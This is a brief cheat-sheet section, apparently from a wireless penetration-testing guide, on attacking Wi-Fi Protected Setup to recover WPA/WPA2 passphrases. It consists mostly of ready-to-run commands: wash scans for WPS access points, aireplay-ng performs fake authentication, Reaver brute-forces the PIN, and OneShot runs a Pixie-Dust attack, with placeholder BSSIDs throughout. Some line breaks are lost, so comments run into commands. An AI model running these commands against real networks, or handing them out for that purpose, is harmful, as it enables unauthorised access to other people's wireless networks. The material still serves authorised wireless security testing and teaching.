Attacking Wi-Fi Protected Setup (WPS)
Wi-Fi Protected Setup (WPS) can allow the WPA/WPA2 passphrase to be recovered through PIN brute-force or Pixie-Dust attacks. This section covers discovering WPS-enabled access points and attacking them with Reaver and OneShot.
Discovering WPS-Enabled Networks
# List WPS-enabled access pointssudo wash --interface wlan0 --scan --surveyReaver
Reaver brute-forces the WPS PIN to recover the WPA/WPA2 passphrase. Fake authentication and setting the correct channel can help the attack associate.
# Optional fake authentication to the targetsudo aireplay-ng --fakeauth 30 -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 wlan0sudo iwconfig wlan0 channel 1 # set the correct channelsudo aireplay-ng --fakeauth 30 -a AA:BB:CC:DD:EE:FF wlan0
# Run Reaver against the targetsudo reaver --bssid AA:BB:CC:DD:EE:FF --channel <channel> --interface wlan0 -vvv --no-associatesudo reaver --bssid AA:BB:CC:DD:EE:FF --channel 2 --interface wlan0 -v --no-associatePixie-Dust Attack (OneShot)
OneShot performs an offline Pixie-Dust attack without requiring monitor mode.
cd ~/tools/OneShot
# Scan for WPS targetssudo ./oneshot.py -i wlan0 -K
# Attack a specific targetsudo ./oneshot.py -i wlan0 -b AA:BB:CC:DD:EE:FF -K
# Online PIN reference# http://3wifi.stascorp.com/wpspin


